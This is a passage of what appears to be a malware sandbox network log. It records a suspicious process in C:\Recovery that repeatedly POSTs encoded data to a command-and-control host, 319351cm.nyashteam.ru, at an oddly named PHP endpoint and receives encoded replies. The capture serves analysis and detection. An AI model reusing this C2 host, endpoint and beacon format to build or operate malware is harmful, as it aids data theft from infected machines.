0b 2c 17 3f 51 2e 14 32 34 21 5e 0e 11 39 55 25 1d 29 01 37 38 0d 57 26 30 20 12 28 17 0e 5f 33 2c 3f 57 29 34 3c 54 30 08 25 56 27 2c 3c 1c 32 3a 0f 06 34 01 0d 56 2c 3c 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%[$./628Y.8U%%[:;<Y!(%+'%$><?(>8#[&\=.&Q=9 1U])5"\=.0!1]!00[88,?Q.24!^9U%)78W&0 (_3,?W)4<T0%V',<2:4V,<#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49805	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:40.314800024 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:12:40.670769930 CET	1012	OUT	Data Raw: 53 51 5f 5c 59 5a 56 5b 5c 56 52 5a 50 5e 5a 57 58 5f 5b 5a 50 5d 56 55 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SQ_\YZV[\VRZP^ZWX_[ZP]VUZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"= >!$>6(&(.$,'1(./4-%!8,-']/!Q!0
Dec 6, 2024 03:12:41.412849903 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:41.713032007 CET	808	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w9vOg0z2DdaMLkadZqgNNEk4ncTVUQWMDsLCQlojeCQKtYh9zW%2B%2Bk5eJTUucmfwFtVHsOZcVpc9bHMRQiKMFZBZ0cutjQdFLGXRUsPaL5PZb60JrhiCpiRV17kMyOaij7bL%2BeVR7Qho%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c09dd9f5c425-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=2935&min_rtt=1629&rtt_var=3224&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=120820&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49810	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:41.961843967 CET	296	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 996 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:12:42.311480999 CET	996	OUT	Data Raw: 56 51 5f 50 59 59 56 5c 5c 56 52 5a 50 5a 5a 54 58 5a 5b 5d 50 5d 56 5d 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VQ_PYYV\\VRZPZZTXZ[]P]V]Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"( !\!$(41;$,+U$8"Y*#!/=W1#!808']/!Q!,
Dec 6, 2024 03:12:43.145085096 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:43.410733938 CET	808	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WfP6Qk31og8mZwtY71FZyPGGiizblPVlyDZBRURG%2B4Qf66uhtAX8TPWuldYdFXBwq3MD55%2BxCsBkjpbaC7RNbhC7TaaJ6X5YLdAFmU7YyGhldAJP0hjrcrq4rlsLWPBieQFHHpnP8Rg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c0a8ab4942ef-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=33304&min_rtt=31498&rtt_var=15425&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1292&delivery_rate=31772&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49813	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:43.650110006 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:12:43.999150038 CET	1012	OUT	Data Raw: 56 50 5f 5a 5c 5a 56 52 5c 56 52 5a 50 58 5a 53 58 5c 5b 5b 50 59 56 5e 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VP_Z\ZVR\VRZPXZSX\[[PYV^Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"@*"=!8+%+&+)&Z+R$(:=>+X4,61:5^+T,=']/!Q!(
Dec 6, 2024 03:12:44.957109928 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49818	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:45.186642885 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:12:45.545815945 CET	1296	OUT	Data Raw: 53 55 5a 5c 59 5e 53 5e 5c 56 52 5a 50 59 5a 57 58 52 5b 5a 50 58 56 5a 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SUZ\Y^S^\VRZPYZWXR[ZPXVZZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!*=]>!/R<52+$?+U0;2Y>? Y!&:3\!(T.-']/!Q!,
Dec 6, 2024 03:12:46.305488110 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:46.766846895 CET	957	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b5Svp6l6mPZlkx1wwJNe2NqVGAKDyIYoKgwjk%2B7Zl0qe6vJKrGL7uEhQuaVuV9wb8loBmRKK%2FsxuBOEWMRKqVyGFX4aK6j8WMFiRkTHkkGreYTxgtpxEiVfhzK0vGK93dmAhCT9xjNo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c0bc6efc43ca-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=18195&min_rtt=14796&rtt_var=12348&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1593&delivery_rate=34766&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 26 05 33 3d 30 13 22 22 02 5b 2d 07 3c 50 26 3e 03 5d 39 28 20 5d 36 05 36 01 28 2f 30 50 27 34 33 5d 2a 2c 25 5a 2b 2f 09 56 3d 02 23 5b 00 13 26 5f 3e 5b 26 53 2a 29 38 19 25 30 35 04 28 26 04 12 29 00 02 0b 37 14 3a 07 36 2e 30 1b 26 3d 3f 55 2f 1b 0e 19 3f 19 3d 09 32 0e 21 5e 0e 11 3a 0c 25 1d 03 03 23 06 02 0d 26 33 24 5e 28 29 33 07 33 06 3f 56 3f 0a 3c 56 24 21 2d 52 33 2f 02 1f 31 39 2e 12 20 2f 0d 1d 39 06 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&3=0""[-<P&>]9( ]66(/0P'43],%Z+/V=#[&_>[&S)8%05(&)7:6.0&=?U/?=2!^:%#&3$^()33?V?<V$!-R3/19. /9#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49819	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:45.304759026 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:12:45.666271925 CET	1012	OUT	Data Raw: 56 57 5a 5b 5c 58 56 5d 5c 56 52 5a 50 59 5a 55 58 5a 5b 5e 50 5e 56 59 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VWZ[\XV]\VRZPYZUXZ[^P^VYZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!0>?T<$';!W$,'V')0!?':0"88;-']/!Q!,
Dec 6, 2024 03:12:46.435615063 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:46.769674063 CET	801	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p4S6wK3tzQsW6YYEaIJBKcBx0m2AeH3euaqP3N34SMa79AD9wCGT8Mt6kGFB4p1jWg9yBVw6A6p0NA69pL0WdQQZt6aZc4wuxWm0T6Fpo7XL7pe6DcdiJ80Ozi6U1QimcS6csEwygxg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c0bd3ae34264-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=6004&min_rtt=3922&rtt_var=5636&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=70925&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49825	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:47.010829926 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:12:47.358258009 CET	1012	OUT	Data Raw: 56 55 5f 5f 5c 58 56 5d 5c 56 52 5a 50 5f 5a 55 58 59 5b 56 50 5e 56 59 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VU__\XV]\VRZP_ZUXY[VP^VYZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!)39[*"<%#'+T%'0._)>(#%:/!8;,']/!Q!4
Dec 6, 2024 03:12:48.097987890 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:48.373867035 CET	806	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fFSPwFiJQXdwUkEKcKlDztqob8cJr0qqg67Hph58t5yEUpDcjjOboFmSO2C9f1LVzgp2r4jL6BopyUMesCSK6TIbm8jFW7c11a32P75Rjn17yAnkP%2FjKTlGu1JogcJJtBjfD%2FqiSADY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c0c7a8540fa0-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=7205&min_rtt=1699&rtt_var=11650&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=31911&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49828	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:48.829791069 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:12:49.186410904 CET	1012	OUT	Data Raw: 53 54 5a 5e 59 59 56 5b 5c 56 52 5a 50 59 5a 53 58 5f 5b 5c 50 5d 56 5f 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: STZ^YYV[\VRZPYZSX_[\P]V_Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!)#&)13V>5(&+5T%?<0(=(=/Y4<1W&*;#(,']/!Q!,
Dec 6, 2024 03:12:49.969049931 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:50.243714094 CET	804	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fLdP9kWmv30by0JxxSB2RXKnYQe8tjkTewW%2B6Eg7w45dXsEH4UnaseHS8KmSdPD6ADKCsEkqEeYzcvmNin984zvXTLoPpDQZG1QLB6xqotcofrbJ%2F7jVjGCCX4oK7Mp%2FS%2BfOHbf4lJE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c0d35e9f429b-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3943&min_rtt=1847&rtt_var=4884&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=78431&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a Data Ascii: 42V\U
Dec 6, 2024 03:12:50.435467958 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	49833	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:50.680463076 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:12:51.030112028 CET	1008	OUT	Data Raw: 53 56 5f 5d 59 59 53 5b 5c 56 52 5a 50 5a 5a 52 58 5e 5b 5f 50 54 56 54 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SV_]YYS[\VRZPZZRX^[_PTVTZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"B0:)T'+% 1]6&Z708:Y>'Y ?&^6('T.-']/!Q!8
Dec 6, 2024 03:12:51.786417007 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	49839	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:51.901381969 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:12:52.248955965 CET	1296	OUT	Data Raw: 56 57 5f 51 59 59 56 5e 5c 56 52 5a 50 5f 5a 55 58 5d 5b 5d 50 5a 56 5a 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VW_QYYV^\VRZP_ZUX][]PZVZZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!) "=#U<& &])2;3*<7':,6;;S/']/!Q!4
Dec 6, 2024 03:12:52.987447977 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:53.237140894 CET	955	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lc4nMzBcmzOy4hX4jiiY0XkuzHh2LDnJONSKzbeY3s27CcAeanJBymqFejlvsN2E%2FWA7mcF%2BHeIPlQjAq0kNpstdTsrAVM%2F1i%2FghGwueVc8%2BqmKHrOLrpNmzOw3jVmf2dAlEQBNUj8M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c0e63e96efa9-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3562&min_rtt=1820&rtt_var=4167&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1593&delivery_rate=92651&cwnd=121&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 25 5d 30 2e 23 02 35 21 24 12 3a 07 24 51 26 10 32 03 39 01 23 04 22 15 18 04 29 2c 37 08 25 24 20 01 3e 3c 22 07 3f 11 06 09 29 28 23 5b 00 13 25 05 3f 2d 0b 0b 3d 39 0e 5d 25 30 31 07 28 36 26 5d 29 3d 2f 1b 20 04 39 1b 23 2e 38 57 27 2e 3f 52 2c 25 06 5b 3c 27 0b 08 31 0e 21 5e 0e 11 39 55 26 55 32 5e 20 3b 34 0f 25 30 02 5e 3f 3a 23 07 33 01 23 12 3f 0a 0e 1f 27 31 25 1d 24 3f 27 0c 26 5c 25 03 20 11 2f 55 39 2c 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a Data Ascii: 98%]0.#5!$:$Q&29#"),7%$ ><"?)(#[%?-=9]%01(6&])=/ 9#.8W'.?R,%[<'1!^9U&U2^ ;4%0^?:#3#?'1%$?'&\% /U9,#_,,R5TQ
Dec 6, 2024 03:12:53.426315069 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	49840	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:52.021533012 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:12:52.373994112 CET	1012	OUT	Data Raw: 53 56 5a 5c 59 5b 53 5f 5c 56 52 5a 50 59 5a 52 58 52 5b 5d 50 5a 56 5f 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SVZ\Y[S_\VRZPYZRXR[]PZV_Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"C*0)#W? 1;&2+V0.(-<#Y)1#;?/=']/!Q!,
Dec 6, 2024 03:12:53.137917995 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:53.373668909 CET	811	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1pPipUDk%2FTPcr1gLjIchMot%2FpPATx6GMUh0e6p2%2FZOSX0Ov03MKQOnNc5anbZhaMwRrQ%2BrCiZQkSrQOPoLkCwYMOOmOc2hBJPGv9yO3dp6Ev9UxYNtyW1H0fx1uYJ1JRol6HMFB%2Brzk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c0e72afec326-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4125&min_rtt=1667&rtt_var=5542&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=68428&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	49846	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:53.618078947 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
